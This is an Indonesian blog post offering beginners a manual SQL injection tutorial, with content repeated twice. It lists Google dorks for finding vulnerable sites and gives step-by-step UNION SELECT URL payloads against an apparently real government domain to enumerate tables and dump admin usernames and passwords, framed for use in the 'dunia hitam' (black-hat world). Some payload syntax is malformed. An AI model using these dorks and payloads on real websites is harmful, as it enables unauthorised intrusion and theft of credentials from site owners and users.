Sql injection manual - Selamat pagi semua para sobat dumai di dunia hitam :D khusus untuk pemula (newbie) kali ini saya akan memposting bagaimana Tutorial Cara sql injection manual , nah sebelumnya anda harus mengerti apa itu sql injection ?
SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat meng insert perintah-perintah SQL melalui url untuk dieksekusi oleh database.
Oke deh langsung saja ke cara dan targetnya, yang paling utama kali ini anda harus mencari target web yang error untuk di eksekusi :D untuk mencari targetnya anda perlu mencari dengan menggunakan search engine optimizer (SEO) google, bing, yahoo , ataupun SEO yang lainnya.
untuk pencariannya anda dapat menggunakan DORK SQL di bawah ini :
Ketentuan mencari target sebenarnya bisa anda mengolahnya sendiri tergantung dari logika anda, nah untuk awal anda cukup menggunakan salah satu dork di atas.
Pertama 1 :
Cari target menggunakan DORK SQL , contoh kali ini targetnya
http://indonesia.go.id/index.php?id=10
Untuk mencari tau apakah web tersebut vuln atau error , tambahkan tanda petik di belakang urlnya
contoh : http://indonesia.go.id/index.php?id=10'
Jika di beri tanda petik terus bertuliskan "
Kedua 2 :
Lanjut lagi ke tahap yang ke dua kali ini kita akan mencari tau letah dari jumlah coloumn yang yang bisa kita eksekusi, pertama dari angka column 1-10
http://indonesia.go.id/index.php?id=10 order by 1--
http://indonesia.go.id/index.php?id=10 order by 2--
http://indonesia.go.id/index.php?id=10 order by 3--
http://indonesia.go.id/index.php?id=10 order by 4--
http://indonesia.go.id/index.php?id=10 order by 5--
http://indonesia.go.id/index.php?id=10 order by 6--
http://indonesia.go.id/index.php?id=10 order by 7--
http://indonesia.go.id/index.php?id=10 order by 8--
http://indonesia.go.id/index.php?id=10 order by 9--
http://indonesia.go.id/index.php?id=10 order by 10-- (Error)
Nah kita menemukan angka jitu nya di angka 10, lanjut kita eksekusi jika angka errornya di angka 10, berarti angka yang kita gunakan untuk mengeksekusi webnya 10-1=9 , jadi angka column yang kita gunakan dari angka 1-9.
Ketiga 3 :
Setelah kita mengetahui jumlah column target, mari lanjut ke angka jitunya, cara ini untuk mengetahui versi dari database php , table, dan column web target.
caranya :
http://indonesia.go.id/index.php?id=-10 union all select 1,2,3,4,5,6,7,8,9--
tambahkan tanda minus (-) di belakang angka 10
nah ketemu angka jitunya misal ada angka 4 dan 5, untuk kali ini pilih angka 5.
Keempat 4 :
Lanjut ke langkah yang ke 4, setelah itu kita cari tahu version dari databasenya
caranya :
http://indonesia.go.id/index.php?id=-10 union all select 1,2,3,4,@@version,6,7,8,9--
tambahkan @@version letah angka 5,nah ketemu versi databasenya contoh versi databasenya versi 5
Kelima 5 :
Sekarang kita akan mencari tahu data jumlah table dari database web target tersebut , caranya : ganti @@version = group_concat(table_name) dan from information_schema.tables where table_schema=database=()-- di belakang angka 9
http://indonesia.go.id/index.php?id=-10 union all select 1,2,3,4,group_concat(table_name),6,7,8,9 from information_schema.tables where table_schema=database=()--
Contoh tampilan kita menemukan table" berikut misal : admin,member,orders,content
Nah lanjut ke langkah 6
Keenam 6 :
Langkah ke enam ini kita akan mengeksekusi table admin caranya kita convers ASCII ke HEX di situs :
http://www.scoutingpages.org/us/tx/troop874/notes/HTML_File.html
kita mendapatkan hasil convers text admin ke hex seperti berikut "97,100,109,105,110" lalu tambahkan group_concat(column_name) dan from information_schema.columns where table_name=char(Isi Angka Hasil Convers Hexnya)--
setelah itu kita lanjut lagi, langsung saja contoh :
http://indonesia.go.id/index.php?id=-10 union all select 1,2,3,4,group_concat(column_name),6,7,8,9 from information_schema.columns where table_name=char(97,100,109,105,110)--
Keluar column user dan password, lanjut ke langkah terakhir kita akan mencari tahu user dan password dari login adminnya.
Ketuju 7 :
Langkah terakhir ini kita akan mencari tahu user dan password web nya, oke langsung saja simak, tambahkan group_concat(user,0x3a,password) dan from admin--
http://indonesia.go.id/index.php?id=-10 union all select 1,2,3,4,group_concat(user,0x3a,password),6,7,8,9 from admin--
terus ketemu deh user admin dan passwordnnya (admin,akug4nten9)
Terimakasih sudah menyimak artiket tentang Sql Injection Manual , semoga artikel ini bermanfaat untuk anda. Salam :D
SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat meng insert perintah-perintah SQL melalui url untuk dieksekusi oleh database.
Oke deh langsung saja ke cara dan targetnya, yang paling utama kali ini anda harus mencari target web yang error untuk di eksekusi :D untuk mencari targetnya anda perlu mencari dengan menggunakan search engine optimizer (SEO) google, bing, yahoo , ataupun SEO yang lainnya.
untuk pencariannya anda dapat menggunakan DORK SQL di bawah ini :
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:read.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: mysql_num_rows()Ketentuan mencari target sebenarnya bisa anda mengolahnya sendiri tergantung dari logika anda, nah untuk awal anda cukup menggunakan salah satu dork di atas.
Pertama 1 :
Cari target menggunakan DORK SQL , contoh kali ini targetnya
http://indonesia.go.id/index.php?id=10
Untuk mencari tau apakah web tersebut vuln atau error , tambahkan tanda petik di belakang urlnya
contoh : http://indonesia.go.id/index.php?id=10'
Jika di beri tanda petik terus bertuliskan "
Warning: mysql_fetch_assoc" maka web target tersebut dapat kita eksekusi :D , nah lanjut yang ke dua.Kedua 2 :
Lanjut lagi ke tahap yang ke dua kali ini kita akan mencari tau letah dari jumlah coloumn yang yang bisa kita eksekusi, pertama dari angka column 1-10
http://indonesia.go.id/index.php?id=10 order by 1--
http://indonesia.go.id/index.php?id=10 order by 2--
http://indonesia.go.id/index.php?id=10 order by 3--
http://indonesia.go.id/index.php?id=10 order by 4--
http://indonesia.go.id/index.php?id=10 order by 5--
http://indonesia.go.id/index.php?id=10 order by 6--
http://indonesia.go.id/index.php?id=10 order by 7--
http://indonesia.go.id/index.php?id=10 order by 8--
http://indonesia.go.id/index.php?id=10 order by 9--
http://indonesia.go.id/index.php?id=10 order by 10-- (Error)
Nah kita menemukan angka jitu nya di angka 10, lanjut kita eksekusi jika angka errornya di angka 10, berarti angka yang kita gunakan untuk mengeksekusi webnya 10-1=9 , jadi angka column yang kita gunakan dari angka 1-9.
Ketiga 3 :
Setelah kita mengetahui jumlah column target, mari lanjut ke angka jitunya, cara ini untuk mengetahui versi dari database php , table, dan column web target.
caranya :
http://indonesia.go.id/index.php?id=-10 union all select 1,2,3,4,5,6,7,8,9--
tambahkan tanda minus (-) di belakang angka 10
nah ketemu angka jitunya misal ada angka 4 dan 5, untuk kali ini pilih angka 5.
Keempat 4 :
Lanjut ke langkah yang ke 4, setelah itu kita cari tahu version dari databasenya
caranya :
http://indonesia.go.id/index.php?id=-10 union all select 1,2,3,4,@@version,6,7,8,9--
tambahkan @@version letah angka 5,nah ketemu versi databasenya contoh versi databasenya versi 5
Kelima 5 :
Sekarang kita akan mencari tahu data jumlah table dari database web target tersebut , caranya : ganti @@version = group_concat(table_name) dan from information_schema.tables where table_schema=database=()-- di belakang angka 9
http://indonesia.go.id/index.php?id=-10 union all select 1,2,3,4,group_concat(table_name),6,7,8,9 from information_schema.tables where table_schema=database=()--
Contoh tampilan kita menemukan table" berikut misal : admin,member,orders,content
Nah lanjut ke langkah 6
Keenam 6 :
Langkah ke enam ini kita akan mengeksekusi table admin caranya kita convers ASCII ke HEX di situs :
http://www.scoutingpages.org/us/tx/troop874/notes/HTML_File.html
kita mendapatkan hasil convers text admin ke hex seperti berikut "97,100,109,105,110" lalu tambahkan group_concat(column_name) dan from information_schema.columns where table_name=char(Isi Angka Hasil Convers Hexnya)--
setelah itu kita lanjut lagi, langsung saja contoh :
http://indonesia.go.id/index.php?id=-10 union all select 1,2,3,4,group_concat(column_name),6,7,8,9 from information_schema.columns where table_name=char(97,100,109,105,110)--
Keluar column user dan password, lanjut ke langkah terakhir kita akan mencari tahu user dan password dari login adminnya.
Ketuju 7 :
Langkah terakhir ini kita akan mencari tahu user dan password web nya, oke langsung saja simak, tambahkan group_concat(user,0x3a,password) dan from admin--
http://indonesia.go.id/index.php?id=-10 union all select 1,2,3,4,group_concat(user,0x3a,password),6,7,8,9 from admin--
terus ketemu deh user admin dan passwordnnya (admin,akug4nten9)
Terimakasih sudah menyimak artiket tentang Sql Injection Manual , semoga artikel ini bermanfaat untuk anda. Salam :D
Labels:
Sql Injection
Belum ada komentar untuk "Tutorial Cara Sql Injection Manual"
Post a Comment